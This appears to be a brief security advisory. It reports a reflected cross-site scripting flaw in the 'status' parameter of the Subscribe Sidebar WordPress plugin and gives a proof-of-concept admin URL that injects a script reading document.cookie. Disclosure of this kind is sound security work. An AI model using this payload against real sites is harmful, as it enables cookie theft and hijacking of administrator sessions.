Tested against – Subscribe Sidebar plugin by Blubrry v1.3.1 | WordPress v5.4.1
Reflected XSS
Reflected XSS
[https://wordpress.org/plugins/subscribe-sidebar/](https://wordpress.org/plugins/subscribe-sidebar/)
The “status” GET parameter in “subscribe_sidebar.php” is vulnerable to reflected XSS attacks.
POC
/wp-admin/options-general.php?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E